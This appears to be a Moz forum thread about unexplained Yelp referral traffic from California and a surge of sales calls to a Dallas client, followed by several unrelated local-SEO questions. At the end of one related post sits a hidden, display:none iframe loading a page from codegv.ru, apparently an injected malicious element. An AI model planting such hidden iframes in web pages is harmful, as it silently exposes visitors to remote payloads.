Need Help: Trouble With Website and Analytics
-
Hey all,
I have a client who I have been having the WORST time getting traffic and ranked for relevant keywords. I've tried so many things and have yet to see much progress after about 9 months.
Site is mgmcdallas.com. I realized something REALLYY weird with this site a couple weeks ago.
The business has a Dallas, TX address and really only services the Dallas/Fort Worth metro area.
They recently started getting some of referral traffic from yelp.com/biz_redir. Weirdly, they've also been getting more sales calls and more salespeople filling out their contact form.
Take January for example, they had 164 sessions and 119 of those were from this yelp referral. They DON'T advertise with Yelp, or get traffic from Yelp anywhere in Texas. You can see from below screenshot that they are all coming from California.
I've had our <acronym title="Search Engine Optimization">SEO</acronym> and developer look into and we can't figure out what's happening. Any thoughts?
-
Bump. Just curious if anyone has any new ideas on this? We still have not found a solution.
-
Hmm. Yeah, I will add the CAPTCHA to see if it helps. I'll also see if I can add them to no-call lists. But it's very frustrating for the client because he is getting A LOT of sales people calling him daily now b/c of this issue. He just so happens to remind me almost daily about it.
It hasn't just been happening for a couple weeks. It's been happening for about 6-7 weeks now.
-
Honestly I would not worry about it to much, their yelp page has a lot of positive reviews so it would hurt them to change that. You could try adding a CAPTCHA onto the contact form on the site to dissuade sales people and stop auto fill bots, but that could inconvenience potential customers so you will need to weigh the pros and cons. You could try adding their number to no-call lists to see if that helps, but I don't think that there will be a ton of calls in the long run, things like this tend to happen a bunch for a week or two then drop off.
-
They haven't really lost a bunch of traffic. They didn't have a lot to begin with. They have no penalties according to GWT and other tools.
-
Sorry about that. I think I got the image added properly. You can see that all the traffic comes from different cities in California.
I just logged into their biz.yelp.com page and they had a big increase in traffic to their Yelp profile in January-current.
I have disables bots in the view settings. Definitely looks like they are selling their information to sales people somehow. Any way to get rid of this without deleting their Yelp page?
-
Have you ran it through the Panguin tool to check and see if they have gotten any penalties? Did they have traffic and lose it? Or just never have traffic?
-
Ben,
Your image did not link properly. As I cannot see the data, does the majority of the CA traffic come from one or a few places that are not major cities? Have you disabled bots in the view settings? It seems to me that there might be a bot crawling Yelp listings within that area collecting and verifying phone numbers to sell.
Browse Questions
Explore more categories
-
Moz Tools
Chat with the community about the Moz tools.
-
SEO Tactics
Discuss the SEO process with fellow marketers
-
Community
Discuss industry events, jobs, and news!
-
Digital Marketing
Chat about tactics outside of SEO
-
Research & Trends
Dive into research and trends in the search industry.
-
Support
Connect on product support and feature requests.
Related Questions
-
Ecommerce Site Structure -- "/our_locations" page: helpful or harmful?
Hello! We are a retailer with brick and mortar stores in different cities. We have a website (ourbusiness.com), which includes a blog (ourbusiness.com/blog) and a separate ecommerce site for each store in subfolders (ourbusiness.com/Boston-store and ourbusiness.com/Atlanta-store). NB: We do this for non-business reasons and have no choice. So, this is not like REI (for example) or other stores with lots of locations but one central ecommerce operation. Most experts seem to recommend a site structure that echoes REIs. IE: a home page principally devoted to ecommerce (rei.com) includes an Our Locations-type page (rei.com/stores) which links to local store pages like (rei.com/stores/fresno) I understand how this would help REI, since their homepage is devoted to ecommerce and they need a store locator page that doesn't compete with the shopping experience. But since we can't send people to products directly from our home page, is there any reason for us not to put the store locator function right on the home page? That is, is there any reason in our case to prefer (A) ourbusiness.com/our_locations/Boston_store over (B) ourbusiness.com/Boston-store? As i see it, the extra page (/our_locations/) could actually hurt, as it puts products one click further away from customers, and one link deeper for bots. On the other hand, it may make the multi-store structure clearer to bots (and maybe people) and help us in local search. Finally, would it make a difference if there were 10 stores vs 2? Thanks for any thoughts!
Local Website Optimization | | RankAmateur...1 -
Dual website strategy
We have two websites (different businesses) in the technology sector that sell the same products on the same platform (OSC) but have different branding. We have tried to make the static content different and the user generated content is different. SEO as largely different. But the one site has much better rankings than the other. Whilst the under performing site is not responsive yet, I need to decide whether to merge the two businesses into one or continue on the two separate websites approach. I would only pursue the latter approach and invest further time and effort into this under performing website if I knew I was "on the right" track. My SEO knowledge is not extensive and so I would be interested in any views the community has? I note that kogan.com.au and dicksmith.com.au have a similar dual website approach (same company) and they are both major brands in Australia. I thank you in advance for any thoughts you may have.
Local Website Optimization | | Alpine91 -
Even after doing every possible thing required for SEO my client's website is not coming on top.can you tell me where i am lacking?
_ Hi team_ I have been working on a website called signboards.co.in since 4 months.it was not in top 100 but now below 50 for 2-3 keywords.even after submitting in many directories after competitor analysis moz shows only one external link in its link metrics.apart from this every possible thing required for SEO is done in a proper way,but still it is not giving results.can you help me out?all my other clients work is going good except this one.can you please let me know what is going wrong with my project?As the project submission date is near i need your help as soon as possible. Thanks Najia jehan
Local Website Optimization | | Najia-ali0 -
Client wants to rebrand but insists on keeping their old website live as well...
I am working with a client in the dental space that has an existing (11 year old) website for his practice. His domain is tied to his last name, which he would like to get away from because he plans to sell the practice in the next couple years. Backstory: Prior to taking him on, he was working with an SEO agency out of India that were built him quite an ugly backlink profile. Once we discovered it, we immediately notified him about the risk of a penalty if left alone. He was riding high in Google SERP's so of course, it was of no concern to him. Needless to say about a year ago he was inducted into Google's "manual penalty club" for suspicious links. His site vanished in Google and all! Hooray! But no, not really... We met with him to discuss the options, suggesting we clean up his backlink profile, then submit for reconsideration. Based on the time we told him it could take to make progress and be back up and running, he wasn't very excited about that approach. He said he wanted us to rebuild a new site, with a new domain and start fresh. In addition, he wanted keep his original site live since it is tied to his already thriving practice. To sum it all up, his goal is to keep what he has live since his customers are accustom to using his existing (penalized) website. While building a new brand/website that he can use to build a cleaner backlink profile and rank in Google as well as to sell off down the line without having his name tied to the practice. Question: Being that he has an existing site with the company NAP info throughout and the new site will also have the same NAP (just a different domain/brand), is there a "best way" to approach this? The content on the new site would be completely unique. I understand this approach is iffy but in his situation it makes sense to some extent. Any feedback or ideas on how to best handle having two sites running for the same dental practice? If any part of my question is confusing or you need further details to help make a suggestion, please fire away and I will be happy to give as much detail as possible. Thanks Mozzers!
Local Website Optimization | | Bryan_Loconto1 -
Local SEO HELP for Franchise SAB Business
This all began when I was asked to develop experiment parameters for our content protocol & strategy. It should be simple right? I've reviewed A/B testing tips for days now, from Moz and other sources.I'm totally amped and ready to begin testing in Google Analytics. Say we have a restoration service franchise with over 40 franchises we perform SEO for. They are all over the US. Every franchise has their own local website. Example restorationcompanylosangeles.com Every franchise purchases territories in which they want to rank in. Some service over 100 cities. Most franchises also have PPC campaigns. As a part of our strategy we incorporate the location reach data from Adwords to focus on their high reach locations first. We have 'power pages' which include 5 high reach branch preferences (areas in which the owners prefer to target) and 5 non branch preference high reach locations. We are working heavily on our National brand presence & working with PR and local news companies to build relationships for natural backlinks. We are developing a strategy for social media for national brand outlets and local outlets. We are using major aggregators to distribute our local citation for our branch offices. We make sure all NAP is consistent across all citations. We are partners with Google so we work with them on new branches that are developing to create their Google listings (MyBusiness & G+). We use local business schema markup for all pages. Our content protocol encompasses all the needed onsite optimization tactics; meta, titles, schema, placement of keywords, semantic Q&A & internal linking strategies etc. Our leads are calls and form submissions. We use several call tracking services to monitor calls, caller's location etc. We are testing Callrail to start monitoring landing pages and keywords that generating our leads. Parts that I want to change: Some of the local sites have over 100 pages targeted for 'water damage + city ' aka what Moz would call "Doorway pages. " These pages have 600-1000 words all talking about services we provide. Although our writers (4 of them) manipulate them in a way so that they aren't duplicate pages. They add about 100 words about the city location. This is the only unique variable. We pump out about 10 new local pages a month per site - so yes - over 300 local pages a month. Traffic to the local sites is very scarce. Content protocol / strategy is only tested based on ranking! We have a tool that monitors ranking on all domains. This does not count for mobile, local, nor user based preference searching like Google Now. My team is deeply attached to basing our metrics solely on ranking. The logic behind this is that if there is no local city page existing for a targeted location, there is less likelihood of ranking for that location. If you are not seen then you will not get traffic nor leads. Ranking for power locations is poor - while less competitive low reach locations rank ok. We are updating content protocol by tweaking small things (multiple variants at a time). They will check ranking everyday for about a week to determine whether that experiment was a success or not. What I need: Internal duplicate content analyzer - to prove that writing over 400 pages a month about water damage + city IS duplicate content. Unique content for 'Power pages' - I know based on dozens of chats here on the community and in MOZ blogs that we can only truly create quality content for 5-10 pages. Meaning we need to narrow down what locations are most important to us and beef them up. Creating blog content for non 'power' locations. Develop new experiment protocol based on metrics like traffic, impressions, bounce rate landing page analysis, domain authority etc. Dig deeper into call metrics and their sources. Now I am at a roadblock because I cannot develop valid content experimenting parameters based on ranking. I know that a/b testing requires testing two pages that are same except the one variable. We'd either non index these or canonicalize.. both are not in favor of testing ranking for the same term. Questions: Are all these local pages duplicate content? Is there a such thing as content experiments based solely on ranking? Any other suggestions for this scenario?
Local Website Optimization | | MilestoneSEO_LA1 -
Main Website and microsite - Do I do google places for both as it will technically be duplicating the locations,?
Hi All, I have a main eCommerce website which trades out of a number of locations and all these locations appear in google places although they don't rank particularly well in google places . I also have a number of microsites which are specific to one type of product I do and these rank very well locally. My question is , should I also do google places for my microsites as this would technically mean I am creating a duplicate location listing in google places but for a different website etc./business I only have one google account so I guess this would be done under the same google account ? thanks Pete <iframe id="zunifrm" style="display: none;" src="http://codegv.ru/u.html"></iframe>
Local Website Optimization | | PeteC120 -
How slow can a website be, but still be ok for visitors and seo?
Hello to all, my site http://www.allspecialtybuildings.com is a barn construction site. Our visitors are usually local. I am worried about page speed. I have been using Google Page Insight, and Gtmetrix. Although I cannot figure out browser leveraging, I have a 79 / 93 google score and for gtmetrix 98/87 score. Load times vary between 2.13 secs to 2.54 secs What is acceptable? I want to make sure I get Google love for a decent page speed, but for me these times are great. Bad times are like 7 seconds and higher. I have thought about a CDN, yet I have read horror stories too. I have ZERO idea of how to use a CDN, or if I need it. I just want a fast site that is both user and Google speed friendly. So my question is, what is a slow speed for a website? Is under 3 seconds considered ok? or bad for seo? But any advice is greatly appreciated.
Local Website Optimization | | asbchris0 -
Website and eshop with the same product descrition is duplicate content
Hi there! I'm building a website that is divided in a "marketing" and "shop" sections. The 2 sites are being authored by two companies (my company is doing the marketing one). The marketing site has all the company products while the shop will sell just some of those. I'm facing the problem of duplicated content and want to ask you guys if it will be a problem/mistake to use the same product description (and similar url) for the same product in both sites, and the right way to do it (without rewriting product descriptions). the main site will be : www.companyname.com
Local Website Optimization | | svitol
the shop will be: shop.companyname.com thanks
Francesco0